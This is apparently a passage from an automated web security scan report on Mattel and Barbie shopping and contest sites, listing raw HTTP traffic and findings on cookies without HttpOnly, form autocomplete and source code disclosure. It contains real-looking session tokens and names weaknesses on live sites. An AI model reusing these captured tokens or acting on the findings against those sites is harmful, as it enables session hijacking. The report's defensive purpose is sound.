Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:30:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 279
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/home/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/shop/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /storeLocator/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gsic_welcome.asp?SMCID=1983&x=http%3A//www.barbie.com/videogirl/ HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SM=GUID=3cf273a3%2D1e33%2D4fb3%2Db7d3%2Df656fd5ae794&AID=&LastVisitDate=12%2F15%2F2010+5%3A42%3A12+PM&SMCID=2066
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQDAABCA=KMEDNHEBKHLACOOPCOCPKBFK; path=/
Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /display_page?page=gallery HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.2.10.1293083893
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /get_entry?id=38;format=thumb HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893
Response
HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://akamai.eprizecdn.net/mattel/barbie/live/27880E68-ED1A-11DF-88F2-44242484E103_0000.png
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 22 Dec 2010 23:59:37 GMT
Content-Length: 0
Content-Type: image/png
Date: Wed, 22 Dec 2010 23:59:37 GMT
Connection: close
Set-Cookie: session=4d1290e9ed7fa8ae; path=/; expires=Thu, 23-Dec-2010 00:29:37 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6035471&rn=1820125381&c7=http%3A%2F%2Fwww.barbie.com%2Fvideogirl%2F&c4=http%3A%2F%2Fwww.barbie.com%2Fvideogirl%2F&c8=Video%20Girl%20-%20Home%20-%20Barbie.com&c9=http%3A%2F%2Fvideogirlcontest.barbie.com%2Fpublic%2Fmedia%2FBarbieGalleryVote_safe.swf&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cb1dc5-204.0.5.41-1286583196
Response
HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 23 Dec 2010 00:01:10 GMT
Connection: close
Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Sat, 22-Dec-2012 00:01:10 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/pdc?cat=&name=landing&sid=2287&browse_products=4199678 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /category/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /family/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /history/index.jsp?ruvClear=yes HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/home/index.jsp
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e1804; expires=Tuesday, 10-Jan-2079 03:29:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/home/index. ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /product/wishlist/wishlist.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/coreg/index ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:14:21 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b120c09041d; expires=Tuesday, 10-Jan-2079 03:28:28 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 361
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/shop/index. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
cluid=4039987430558971793; expires=Mon, 23 Dec 2030 00:14:24 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /in.php?site_id=140415&res=1920x1200&lang=en&secure=0&href=%2Fshop%2Findex.jsp%3FcategoryId%3D10811496%26sr%3D1%26origkw%3Dvideo&title=Video%20Collection%20-%20Shop.Mattel.Com&ref=&jsuid=4039987430558971793&mime=js&x=0.3191598958801478 HTTP/1.1
Host: stats.clear-media.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-8+etch6
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: cluid=4039987430558971793; expires=Mon, 23 Dec 2030 00:14:24 GMT; path=/
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /if/146 HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pID=|146,4199678; uID=CsF6Mk0Sky7AdwIeH6r8Ag==
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Thu, 23 Dec 2010 00:14:27 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.7.65
Set-Cookie: pID=|146,4199678; expires=Sat, 22-Dec-2012 00:00:00 GMT; domain=.mediaforge.com; path=/
Content-Length: 1367
Connection: keep-alive
<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div'; ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /if/146/?prodID=4199678 HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Thu, 23 Dec 2010 00:09:18 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.7.65
Set-Cookie: pID=|146,4199678; expires=Sat, 22-Dec-2012 00:00:00 GMT; domain=.mediaforge.com; path=/
Set-Cookie: uID=CsF6Mk0Sky7AdwIeH6r6Ag==; expires=Fri, 23-Dec-11 00:09:18 GMT; domain=.mediaforge.com; path=/
Content-Length: 1367
Connection: keep-alive
<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div'; ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /videogirl/ HTTP/1.1
Host: www.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wdgjdh55j4yeggemedanpan4; logcookie=2c7468ff-e3a8-450d-8fcc-30c2ae15b5a0; CanadaRedirect=yes; gn_country=US; flashDetected=true; __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:01:01 GMT
Server: MII-WSD/1.4
Cache-Control: private
Pragma: no-cache
Expires: Thu, 23 Dec 2010 00:00:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: NSC_Cbscjf_Xfcgbsn=440af0aa3660;expires=Thu, 23-Dec-10 00:03:28 GMT;path=/
Via: HTTP/1.1 www.barbie.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet (NC)
Content-Type: text/html; charset=utf-8
Content-Length: 25831
Via: 1.1 bfi107106 (MII-APC/1.6)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:10:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 56514
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--Preview TimeZone = 'null' --><!--Preview Time ...[SNIP]... <tr>
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.